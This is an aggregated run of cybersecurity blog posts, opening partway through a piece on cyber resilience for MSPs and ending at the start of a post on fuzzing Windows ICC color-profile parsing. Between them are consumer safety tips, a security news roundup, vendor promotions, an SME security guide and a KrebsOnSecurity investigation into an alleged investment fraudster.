These attacks can be difficult even for highly sophisticated enterprise security teams to detect, stop or recover from. But all businesses, no matter their size, must be ready for them. As such, MSPs, themselves ranging in size from a few techs to a few hundred professionals, may find they need help protecting their SMB customers from APTs; that’s on top of the consistent onslaught of threats from ordinary, profit-motivated cyberattackers. That’s where the concept of cyber resilience comes in.

What does cyber resilience look like?

“Being [cyber] resilient – knowing that even if you’re knocked offline you can recover quickly – is essential for today’s businesses,” George says.

The reality is that today’s organizations have to accept a breach is pretty much inevitable. Their level of cyber resilience is the measure of the organization’s ability to keep the business running and get back to normal quickly. “It’s being able to absorb punches and get back on your feet, no matter what threatens,” as George put it in a recent podcast with Joe Panettieri, co-founder MSSP Alert & ChannelE2E.

Read more about how businesses can build a cyber resilient company culture.

How can businesses and MSPs achieve cyber resilience?

Because cyber resilience is about both defending against attacks and preparing for their inescapability,  a major component in a strong resilience strategy is the breadth of coverage a business has. In particular, having tested and proven backup and disaster recovery solutions in place is the first step in surviving a breach. If a business has reliable, real-time (or near real-time) recovery capabilities, then in the event of an attack, they could make it through barely skipping a beat.

Now, George has clarified that “no single solution can offer complete immunity against cyberattacks on its own.” To reduce the risk of events like data loss from accidental deletion, device theft or hardware failure, your clients need multiple layers of protection that secure their devices and data from multiple angles. Here are George’s top data protection tips:

Ultimately, George says ensuring business continuity for MSPs and the businesses they serve through comprehensive cyber resilience solutions is the primary goal of the Carbonite + Webroot division of OpenText.

“We want to up the advocacy and stop attacks from happening as much as we possibly can.  At  the  same time, when they inevitably do happen, we want to be able to help MSPs recover and limit lost time, reputation damage, and financial impact so businesses can keep functioning.”

To learn more about cyber resilience, click here.

The post Cyber Resilience for Business Continuity appeared first on Webroot Blog.

Registration now OPEN for the Virtual NICE Conference Series!

2020 NICE Conference & Expo REGISTRATION NOW OPEN WEEKLY CONFERENCE SUB-THEMES Growing & Sustaining the NICE Community Tuesday, October 27 | 1 - 5:15 PM EDT The Learning Ecosystem Thursday, November 5 | 1 - 5 PM EST Career Discovery Monday, November 9 | 1 - 5 PM EST Talent Management Monday, November 16 | 1 - 4:45 PM EST Register Now Conference Agenda Each conference day has been organized so each attendee can attend breakout sessions of their choosing, visit the exhibitor hall, and connect with other attendees in the networking lounge. View the agenda online. Conference Workshops Available at

Red Team — Automation or Simulation?

What is the difference between a penetration test and a red team exercise? The common understanding is that a red team exercise is a pen-test on steroids, but what does that mean? While both programs are performed by ethical hackers, whether they are in-house residents or contracted externally, the difference runs deeper. In a nutshell, a pen-test is performed to discover exploitable

8 Ways to Help Senior Adults Stay Safe Online These Days

senior looking at smartphone

8 Ways to Help Senior Adults Stay Safe Online These Days

Technology has come in handy for most of us during these days of pandemic distancing. But for the -at-risk, homebound senior population, technology has been a lifeline connecting them to family members, online services, and healthcare. Still, this unprecedented shift to virtual life has also come with potential risks that seniors and their families should keep in mind.

According to a Pew study, senior adults continue to become more digitally connected, but adoption rates continue to trail younger users, and digital divides remain. The study also revealed that 77% of older adults needed assistance when it came to learning how to use technology.

If you are a senior or someone helping a senior become more tech-savvy, online safety should be a priority. Here are just some of the risks seniors may encounter and some helpful ways to stay safe.

Secure home routers and devices. Be sure to change your router’s default username and password to something strong and unique. Also, change the default passwords of any connected device before connecting to your home network. IoT (Internet of Things) devices are all the technologies under your roof that can connect such as security systems, healthcare monitors, hearing aids, and smart TVs.  These technologies are embedded with sensors or software that can connect and exchange data with other household devices — and each must be secured to close privacy gaps. There are also routers with embedded security, to help secure the home from threats, no matter what devices is connected to the home network.

Use strong passwords. Strong passwords are essential for in-home devices, personal devices, social media sites, and any healthcare or banking portal. Creating a strong password is also a front-line defense against identity theft and fraud.  For seniors, keeping passwords in one place is important, but can be hard to remember them all.  comprehensive security software  includes password management functionality, which makes it easer, to create and safely archive your passwords. -.

Avoid scams. There are a number of scams that target seniors. Phishing scams are emails that look legitimate that end up taking millions from seniors every year. For this reason, never click on suspicious links from government agencies, banks, hospitals, brokerages, charities, or bill collectors unless you are certain they are legitimate. Scammers use these malicious links to con people out of giving away cash or personal data that can be used to create a number of fraudulent accounts. Consider protecting all personal devices with a comprehensive security solution.

Use a personal VPN. A Virtual Private Network (VPN) encrypts (or scrambles) your data when you connect to the Internet and enables you to browse or bank with your credentials and history protected. To learn about VPNs, watch this video.

Beware of dating scams. People aren’t always who they appear to be online. And while dating scams can happen to any age group, they can be especially harmful to a vulnerable senior who may be lonely and living on a limited income. Love scam red flags: Beware of people who claim to be from the U.S. but often travel or work overseas. Also, avoid people who profess their love too quickly, share personal struggles too soon, and never meet face-to-face.

Take a closer look. Fraudulent websites look very real these days. A secure website will have an “https” in the browser’s address bar. The “s” stands for “secure.” If the web address or URL is just http, it’s not a secure site. Still unsure? Read reviews of the site from other users before making a purchase. Never send cash, cashier’s check, or a personal check to any online vendor. If purchasing, always use a credit card in case there is a dispute.

Never share personal data. Be wary of emails or websites that require you to give personal information, such as your social security number, phone number, account, or family information.  This includes those fun social media quizzes, which are also ways that cybercriminals can find out your personal details, such as a pets name, year you were born, your home town. All those pieces of personal data can be used to commit identity theft.

Monitor financial accounts. Nowadays, it’s essential to review all financial statements for fraudulent activity. If suspicious activity is found, report it to your bank or credit card account immediately. It’s also a good idea to put a credit alert on your accounts to detect potential fraud.

This unique time has issued unique challenges to every age group. However, if you know a senior, keep their potential technology needs in mind. Check in from time to time and offer your help. If you are a tech-savvy senior (and I know many), consider reaching out to peers who may be struggling and afraid to ask. In addition, YouTube has a number of easy-to-understand videos on any tech question. In addition, both Apple and Microsoft stores offer free advice on their products and may also help. Just be sure to visit their official websites to reach legitimate tech support channels.

The post 8 Ways to Help Senior Adults Stay Safe Online These Days appeared first on McAfee Blogs.

Weekly Update 210

Weekly Update 210

Wow, 4 years already. Regardless of where I've been in the world or the stresses that have been going on in my personal life, every single week without exception there's been a video. This makes 210 of them now, and these days they're live from a much more professional setup in a location that has absolutely no chance of changing for the foreseeable future. Not exactly the way I saw things panning out 4 years ago, but I guess we've all been a bit blindsided on that front. Anyway, on with the show and there's not a lot on the professional front this week due to downtime with the kids over their holidays, but some good audience questions I hope people enjoy. Next week - something I'm very excited about and it has absolutely nothing to do with tech 😊

Weekly Update 210
Weekly Update 210
Weekly Update 210
Weekly Update 210

References

  1. I've done this video every single week for 4 years, no matter where I've been (that's a link to the first one ever - same same but different)
  2. I've been replacing external Ubiquiti access points with in-wall units... and they're awesome! (I'll gradually go through the house and replace all the wall sockets with these)
  3. Was Activision "hacked" or do people just choose bad passwords? (without evidence to the contrary, my money is on the latter)
  4. Sponsored by: Join the Microsoft Reactor community for workshops, panels and events to expand your skillset across a range of technologies and topic areas

Emotet Trojan is back as the world unlocks

A threat actor named Emotet Trojan has been in the wild for more than 5 years, and now it is back after a 5 months break. It has spread globally, infecting new as well as old targets. It is re-launched with multiple Malspam Campaigns to distribute in all sectors. We…

Who is Tech Investor John Bernard?

John Bernard, the subject of a story here last week about a self-proclaimed millionaire investor who has bilked countless tech startups, appears to be a pseudonym for John Clifton Davies, a U.K. man who absconded from justice before being convicted on multiple counts of fraud in 2015. Prior to his conviction, Davies served 16 months in jail before being cleared of murdering his wife on their honeymoon in India.

The Private Office of John Bernard, which advertises itself as a capital investment firm based in Switzerland, has for years been listed on multiple investment sites as the home of a millionaire who made his fortunes in the dot-com boom 20 years ago and who has oodles of cash to invest in tech startups.

But as last week’s story noted, Bernard’s investment company is a bit like a bad slot machine that never pays out. KrebsOnSecurity interviewed multiple investment brokers who all told the same story: After promising to invest millions after one or two phone calls and with little or no pushback, Bernard would insist that companies pay tens of thousands of dollars worth of due diligence fees up front.

However, the due diligence company he insisted on using — another Swiss firm called Inside Knowledge — also was secretly owned by Bernard, who would invariably pull out of the deal after receiving the due diligence money.

Neither Mr. Bernard nor anyone from his various companies responded to multiple requests for comment over the past few weeks. What’s more, virtually all of the employee profiles tied to Bernard’s office have since last week removed those firms from their work experience as listed on their LinkedIn resumes — or else deleted their profiles altogether.

Sometime on Thursday John Bernard’s main website — the-private-office.ch — replaced the content on its homepage with a note saying it was closing up shop.

“We are pleased to announce that we are currently closing The Private Office fund as we have reached our intended investment level and that we now plan to focus on helping those companies we have invested into to grow and succeed,” the message reads.

As noted in last week’s story, the beauty of a scam like the one multiple investment brokers said was being run by Mr. Bernard is that companies bilked by small-time investment schemes rarely pursue legal action, mainly because the legal fees involved can quickly surpass the losses. What’s more, most victims will likely be too ashamed to come forward.

Also, John Bernard’s office typically did not reach out to investment brokers directly. Rather, he had his firm included on a list of angel investors focused on technology companies, so those seeking investments usually came to him.

Finally, multiple sources interviewed for this story said Bernard’s office offered a finders fee for any investment leads that brokers brought his way. While such commissions are not unusual, the amount promised — five percent of the total investment in a given firm that signed an agreement — is extremely generous. However, none of the investment brokers who spoke to KrebsOnSecurity were able to collect those fees, because Bernard’s office never actually consummated any of the deals they referred to him.

PAY NO ATTENTION TO THE EMPTY BOOKSHELVES

After last week’s story ran, KrebsOnSecurity heard from a number of other investment brokers who had near identical experiences with Bernard. Several said they at one point spoke with him via phone or Zoom conference calls, and that he had a distinctive British accent.

When questioned about why his staff was virtually all based in Ukraine when his companies were supposedly in Switzerland, Bernard replied that his wife was Ukrainian and that they were living there to be closer to her family.

One investment broker who recently got into a deal with Bernard shared a screen shot from a recent Zoom call with him. That screen shot shows Bernard bears a striking resemblance to one John Clifton Davies, a 59-year-old from Milton Keynes, a large town in Buckinghamshire, England about 50 miles (80 km) northwest of London.

John Bernard (left) in a recent Zoom call, and a photo of John Clifton Davies from 2015.

In 2015, Mr. Davies was convicted of stealing more than GBP 750,000 from struggling companies looking to restructure their debt. For at least seven years, Davies ran multiple scam businesses that claimed to provide insolvency consulting to distressed companies, even though he was not licensed to do so.

“After gaining the firm’s trust, he took control of their assets and would later pocket the cash intended for creditors,” according to a U.K. news report from 2015. “After snatching the cash, Davies proceeded to spend the stolen money on a life of luxury, purchasing a new upmarket home fitted with a high-tech cinema system and new kitchen.”

Davies disappeared before he was convicted of fraud in 2015. Two years before that, Davies was released from prison after being held in custody for 16 months on suspicion of murdering his new bride in 2004 on their honeymoon in India.

Davies’ former wife Colette Davies, 39, died after falling 80 feet from a viewing point at a steep gorge in the Himachal Pradesh region of India. Mr. Davies was charged with murder and fraud after he attempted to collect GBP 132,000 in her life insurance payout, but British prosecutors ultimately conceded they did not have enough evidence to convict him.

THE SWISS AND UKRAINE CONNECTIONS

While the photos above are similar, there are other clues that suggest the two identities may be the same person. A review of business records tied to Davies’ phony insolvency consulting businesses between 2007 and 2013 provides some additional pointers.

John Clifton Davies’ former listing at the official U.K. business registrar Companies House show his company was registered at the address 26 Dean Forest Way, Broughton, Milton Keynes.

A search on that street address at 4iq.com turns up several interesting results, including a listing for senecaequities.com registered to a John Davies at the email address john888@myswissmail.ch.

A Companies House official record for Seneca Equities puts it at John Davies’ old U.K. address at 26 Dean Forest Way and lists 46-year-old Iryna Davies as a director. “Iryna” is a uniquely Ukrainian spelling of the name Irene (the Russian equivalent is typically “Irina”).

A search on John Clifton Davies and Iryna turned up this 2013 story from The Daily Mirror which says Iryna is John C. Davies’ fourth wife, and that the two were married in 2010.

A review of the Swiss company registrar for The Inside Knowledge GmbH shows an Ihor Hubskyi was named as president of the company. This name is phonetically the same as Igor Gubskyi, a Ukrainian man who was listed in the U.K.’s Companies House records as one of five officers for Seneca Equities along with Iryna Davies.

KrebsOnSecurity sought comment from both the U.K. police district that prosecuted Davies’ case and the U.K.’s National Crime Agency (NCA). Neither wished to comment on the findings. “We can neither confirm nor deny the existence of an investigation or subjects of interest,” a spokesperson for the NCA said.

This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

 

 

Read on:

 

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

Stay Connected & Protected: Weaving Security Into Our Social Media Habits

Social Media Habits

Stay Connected & Protected: Weaving Security Into Our Social Media Habits

Today, there are so many different avenues where we receive information.

Personally, I prefer finding out what’s going on in the world by scanning my favorite news channels’ websites and by receiving personalized feeds and notifications to my phone. My wife, however, scans social media platforms – from Facebook to Twitter to Instagram – to discover the latest happenings. My teenage daughter spends 2+ hrs a day on social media platforms engaging with her friends.

While were initially meant to help us stay connected, they come with their own handful of security implications. Let’s explore what these threats are and how to stay protected.

Sketchy Links Get Social

Users rely on social media to feel connected. So while the world was social distancing, social media grew more popular than ever before – as of March 2020, people are on social media 44% more worldwide. However, with these platforms being so popular, they’ve become a hotspot for cybercriminal schemes.

There’s a variety of potential threats on social platforms, including misinformation, account takeovers, and phishing scams. The latter threat is all too common, as these platforms have become a popular avenue for cybercriminals to spread troublesome links and websites.

To lure unsuspecting users into clicking on these links, hackers often tap into what consumers care about. These topics have ranged from fake tech support scams to getting verified on Instagram.

Scan Social Safely with McAfee® WebAdvisor

At McAfee, we want users to enjoy a safe online social life. That’s why we created a new McAfee® WebAdvisor feature that scans for dangerous links across six major social media sites – Facebook, Twitter, YouTube, Instagram, Reddit, and LinkedIn – so users can scroll their feeds with confidence. To do this, McAfee WebAdvisor now color codes links across these social platforms, as it has always done for online searches, to show which ones are safe to visit.

It’s important to take advantage of new technologies that help us adapt and grow into security superstars. My family and I are excited to see this new feature roll out across our existing McAfee® Total Protection subscription. That way we can keep up with the latest news and trends, as well as stay connected with family and friends without worrying about any potential threats. I can sleep much better at night knowing that my whole family will be both connected and protected.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Stay Connected & Protected: Weaving Security Into Our Social Media Habits appeared first on McAfee Blogs.

MSP Insight: Netstar Shares Cyber Resilience Strategies for Remote Work

Reading Time: ~ 5 min.

Guest blog by Mit Patel, Managing Director of London based IT Support company, Netstar.

In this article, Webroot sits down with Mit Patel, Managing Director of London-based MSP partner, Netstar, to discuss the topic of remote work during a pandemic and tips to stay cyber resilient.

Why is it important to be cyber resilient, specifically when working remote?

It’s always important to be cyber resilient, but a lot has changed since the start of the COVID-19 lockdown that needs to be taken into consideration.

Remote work has posed new problems for businesses when it comes to keeping data secure. Since the start of lockdown, there has been a significant increase in phishing scams, ransomware attacks and malicious activity. Scammers now have more time to innovate and are using the widespread anxiety of coronavirus to target vulnerable people and businesses.

Moreover, the sudden shift in working practices makes the pandemic a prime time for cyber-attacks. Employees can no longer lean over to ask a colleague if they are unsure about the legitimacy of an email or web page. Instead, they need to be confident in their ability to spot and avoid potential security breaches without assistance.

Remote work represents a significant change that can’t be ignored when it comes to the security of your business. Instead, businesses need to be extra vigilant and prioritise their cyber resilience.

What does cyber resilience mean to you?

It’s important to differentiate between cyber resilience and cyber security. Cyber security is a component of cyber resilience, referring to the technologies and processes designed to prevent cyber-attacks. Whereas, I believe cyber resilience goes a step further, referring to the ability to prevent, manage and respond to cyber threats. Cyber resilience recognises that breaches can and do happen, finding effective solutions that mean businesses recover quickly and maintain functionality. The main components of cyber resilience include, training, blocking, protecting, backing up and recovering. When all these components are optimised, your cyber resilience will be strong, and your business will be protected and prepared for any potential cyber threats.

Can you share some proactive methods for staying cyber resilient when working remote?

Absolutely. But it’s important to note that no solution is 100% safe and that a layered approach to IT security is necessary to maximise protection and futureproof your business.

Get the right antivirus software. Standard antivirus software often isn’t enough to fully protect against viruses. Businesses need to consider more meticulous and comprehensive methods. One of our clients, a licensed insolvency practitioner, emphasized their need for software that will ensure data is protected and cyber security is maximised. As such, we implemented Webroot SecureAnywhere AnitVirus, receiving excellent client feedback, whereby the client stressed that they can now operate safe in the knowledge that their data is secure.

Protect your network. DNS Protection is a critical layer for your cyber resilience strategy. DNS will protect you against threats such as malicious links, hacked legitimate websites, phishing attacks, CryptoLocker and other ransomware attacks. We have implemented DNS Protection for many of our clients, including an asset management company that wanted to achieve secure networks with remote working capability. In light of the current remote working situation, DNS Protection should be a key consideration for any financial business looking to enhance their cyber resilience.

Ensure that you have a strong password policy. Keeping your passwords safe is fundamental for effective cyber resilience, but it may not be as simple as you think. Start by making sure that you and your team know what constitutes a strong password. At Netstar, we recommend having a password that:

  • Is over 10 characters long
  • Contains a combination of numbers, letters and symbols
  • Is unpredictable with no identifiable words (even if numbers or symbols are substituted for letters)

You should also have different passwords for different logins, so that if your security is compromised for any reason, hackers can only access one platform. To fully optimise your password policy, you need to consider multi-factor authentication. Multi-factor authentication goes a step further than the traditional username-password login. It requires multiple forms of identification in order to access a certain email account, website, CRM etc. This will include at least two of the following:

  • Something you know (e.g. a password)
  • Something you have (e.g. an ID badge)
  • Something you are (e.g. a fingerprint)

Ensure that you have secure tools for communication. Collaboration tools, like Microsoft Teams, are essential for remote working. They allow you to communicate with individuals, within teams and company-wide via audio calls, video calls and chat.

When it comes to cyber resilience, it’s essential that your team know what is expected of them. You should utilise collaboration tools to outline clear remote working guidance to all employees. For example, we would recommend discouraging employees from using personal devices for work purposes. The antivirus software installed on these devices is unlikely to be of the same quality as the software installed on work devices, so it could put your business at risk.

Furthermore, you need to be confident that your employees can recognise and deal with potential security threats without assistance. Individuals can no longer lean across to ask a colleague if they’re unsure of the legitimacy of something. They need to be able to do this alone. Security awareness training is a great solution for this. It will teach your team about the potential breaches to look out for and how to deal with them. This will cover a range of topics including, email phishing, social media scams, remote working risks and much more. Moreover, courses are often added and updated, meaning that your staff will be up to date with the latest scams and cyber threats.

Implement an effective backup and disaster recovery strategy

Even with every preventive measure in place, things can go wrong, and preparing for disaster is crucial for effective cyber resilience.

In fact, a lot of companies that lose data because of an unexpected disaster go out of business within just two years, which is why implementing an effective backup and disaster recovery strategy is a vital layer for your cyber resilience strategy.

First, we advise storing and backing up data using an online cloud-based system. When files are stored on the cloud, they are accessible from any device at any time. This is particularly important for remote working; it means that employees can collaborate on projects and access necessary information quickly and easily. It also means that, if your device is wiped or you lose your data, you can simply log in to your cloud computing platform and access anything you might need. Thus, data can easily be restored, and you’re protected from potential data loss.

Overall, disaster recovery plans should focus on keeping irreplaceable data safe. Consider what would happen to your data in the event of a disaster. If your office burned down, would you be confident that all your data would be protected?

You should be working with an IT support partner that can devise an effective and efficient disaster recovery plan for your business. This should set out realistic expectations for recovery time and align with your insurance policy to protect any loss of income. Their goal should be to get your business back up and running as quickly as possible, and to a high standard (you don’t want an IT support partner that cuts corners). Lastly, your IT support provider should regularly test your strategy, making sure that if disaster did occur, they could quickly and effectively restore the functionality of your business.

What else should fellow MSPs keep in mind during this trying time?

In the last four years, cyber resilience has become increasingly important; there are so many more threats out there, and so much valuable information that needs protecting.

We have happy clients because their machines run quickly, they experience less IT downtime, and they rarely encounter viruses or malicious activity. We know that we need to fix customers’ problems quickly, while also ensuring that problems don’t happen in the first place. Innovation is incredibly important to us, which is why we’ve placed a real focus on proactive client advisory over the last 24 months.

That’s where a strong cyber resilience strategy comes into play. MSPs need to be able to manage day-to-day IT queries, while also focusing on how technology can help their clients grow and succeed in the future.There is plenty of advice around the nuts and bolts of IT but it’s the advisory that gives clients the most value. As such, MSPs should ensure they think like a customer and make technological suggestions that facilitate overall business success for their clients.

The post MSP Insight: Netstar Shares Cyber Resilience Strategies for Remote Work appeared first on Webroot Blog.

Watch Here: Using Analytics to Measure AppSec ROI

Maximizing the value of your application security (AppSec) analytics not only provides a window into whether or not you???re meeting security requirements but also it helps you prove your ROI. That can be a challenge for a lot of organizations ??? when stakeholders are not close to the data, they may miss milestones like hitting goals for reducing security debt or even how much AppSec program has matured by data.

In this episode of our How-To Series, Anne Nielsen, Principal Product Manager at Veracode, breaks down the ways analytics can help you and your team move your AppSec program forward with data-driven insights. Those insights prove your everyday security efforts to stakeholders and help you see where you may need to give your security procedures a boost, which means they???re mission-critical to your AppSec success.

Like in any industry, analytics in AppSec are critical to demonstrating progress and ensuring that your organization???s stakeholders keep the budget alive for critical AppSec tools and solutions. Veracode Analytics are unpacked in data visualizations and pre-built dashboards so that management and your team members have a clear picture of the results and can use them to guide future investments.

Your AppSec program doesn???t have to fail because you don???t have the right data, or because you???re not looking at your data in the right way and properly assessing your findings to remediate the right flaws. Watch this video to learn about Veracode Analytics and measuring your AppSec ROI, including what that means for the health for your security program, and check out the full How-to Series here.ツ?

ツ?

Small business cyber security: the ultimate guide

If you’re an SME, cyber security might seem impossibly complex and filled with endless pitfalls.

Although it’s true that there’s a lot at stake – with ineffective security measures potentially threatening your productivity, your bank accounts, and your employees’ and third parties’ personal data – the path to effective security needn’t be difficult.

In this blog, we explain everything that small business owners need to know about protecting their organisations and reducing the risk of security breaches.

Why cyber security presents unique risks for SMEs

The difficulties that small businesses face when addressing cyber risks can be separated into financial costs and their ability to gain expert advice.

When we talk about ‘cost’, there are several issues at play. First, there is the fact that many small and medium-sized enterprises lack the budget to invest in comprehensive defences.

Second, there are the costs that organisations occur as a result of a security incident. We’ll talk about the specific financial effects of this in more detail below, but it’s worth noting that the first issue clearly affects the other.

SMEs that are reluctant to invest in in cyber security practices are not only more likely to fall victim but will experience exponentially larger costs as a result – and in many cases, the damage will be insurmountable.

You cannot cut corners when it comes to cyber threats. However tight your budget, you must find a way to address cyber security.

That brings us on to the second difficulty that you face: gaining expert advice. The demand for cyber security professionals far outweighs supply, with one report claiming that there will be 3.5 million unfilled jobs in the industry by 2021.

Those with the necessary skills can therefore command a much larger salary, meaning small organisations are being priced out of the market.

SMEs’ best course of action is to look internally – offering existing employees the opportunity to move into a career in cyber security.

Those in an IT background are particularly suited to this career switch, because – although technology only encompasses one aspect of information security – there is a large overlap.

Why SMEs can’t ignore cyber security

Let’s now take a closer look at the repercussions that small organisations face if they don’t properly address cyber security.

  • Business disruption

The first problem that you’ll run into is business disruption. An attack on your systems may paralyse your network or force you to close off parts of your business to make sure cyber criminals can no longer access your data.

In the time it takes you to investigate the cause of the breach and to get your systems back online, you will be unable to perform certain operations and are likely to experience a loss of production.

  • Remedial costs and regulatory fines

Getting up and running again is only your first obstacle. If the incident was serious enough, you will need to contact affected customers as well as your data protection supervisory authority, which in the UK is the ICO (Information Commissioner’s Office).

Notifying customers alone can be an expensive and time-consuming endeavour.

You may have to set up helpdesks so that those affected can get in contact to learn more, or even offer them complementary credit checks to reassure them that the breach has no personal financial implications for them.

In addition to this, the ICO may well decide that the incident was a result of a GDPR (General Data Protection Regulation) violation, in which case you are liable to receive a financial penalty and face legal action.

  • Reputational damage

Finally, the incident might result in long-term reputational damage. It can be hard for organisations to retain customers’ trust – and that’s particularly true for small organisations – so you may experience significant customer churn.

According to CISO’s Benchmark Report 2020, a third of organisations said they experienced reputational damage as a result of a data breach.


Want to know more about keeping your organisation safe?

Download our free guide: Cyber Security 101 – A guide for SMEs.


Top threats to SMEs

According to Verizon’s 2020 Data Breach Investigations Report, 28% of data breaches involved SMEs. But what makes them so vulnerable?

Their biggest vulnerability is human error. Small organisations are far less likely than larger ones to have systematic staff awareness training programmes in place, meaning there is an increased possibility of someone making an avoidable mistake.

This includes things such as reusing their password on multiple accounts, falling for a phishing scam or failing to properly dispose of sensitive information when it’s no longer needed.

On a similar note, employees at small organisations are more likely to act maliciously – purposely using information in a way that’s detrimental to the organisation.

One reason for this is that smaller organisations are less likely to have monitoring tools to catch them in the act. For example, they might not have access controls installed, which would limit the amount of information that an employee could view.

Without it, any member of staff who wanted to steal sensitive information (perhaps with the intention of selling it on the dark web) could do so, and the organisation would be unable to tell who was responsible.

Another threat that small organisations in particular are vulnerable to is ransomware. This is a type of malware in which criminal hackers lock users out of their systems and demand money for a decryption code.

The most effective way to mitigate the risk of ransomware is to regularly back up your files to an external server. That way, should your systems become infected, you will be able to disconnect them, wipe the data and restore your information using the backups.

This process will take some time – anywhere from a couple of days to a couple of weeks, depending on the size of your operations – but it will be much less expensive and disruptive, and is a far more prudent approach than paying a criminal and hoping that they keep their word.

Unfortunately, many SMEs don’t invest in comprehensive backup strategies, making them an ideal target for crooks.

What can you do to protect your small business from cyber threats?

Most small organisations know that they should be doing more to protect themselves, but it can be difficult knowing where to begin. That’s where our Cyber Security as a Service can help.

With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.

They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.

The post Small business cyber security: the ultimate guide appeared first on IT Governance UK Blog.

Fuzzing Image Parsing in Windows, Part One: Color Profiles

Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers. In this multi-part blog series, I am reviewing Windows OS’ built-in image parsers and related file formats: specifically looking at creating a harness, hunting for corpus and fuzzing to find vulnerabilities. In part one of this series I am looking at color profiles—not an image format itself, but something which is regularly embedded within images. 

What is an ICC Color Profile?

Wikipedia provides a more-than-adequate description of ICC color profiles: "In color management, an ICC profile is a set of data that characterizes a color input or output device, or a color space, according to standards promulgated by the International Color Consortium (ICC). Profiles describe the color attributes of a particular device or viewing requirement by defining a mapping between the device source or target color space and a profile connection space (PCS). This PCS is either CIELAB (L*a*b*) or CIEXYZ. Mappings may be specified using tables, to which interpolation is applied, or through a series of parameters for transformations.

In simpler terms, an ICC color profile is a binary file that gets embedded into images and parsed whenever ICC supported software processes the images. 

Specification

The ICC specification is around 100 pages and should be easy to skim through. Reading through specifications gives a better understanding of the file format, different types of color profiles, and math behind the color transformation. Furthermore, understanding of its file format internals provides us with information that can be used to optimize fuzzing, select a good corpus, and prepare fuzzing dictionaries.

History of Color Management in Windows

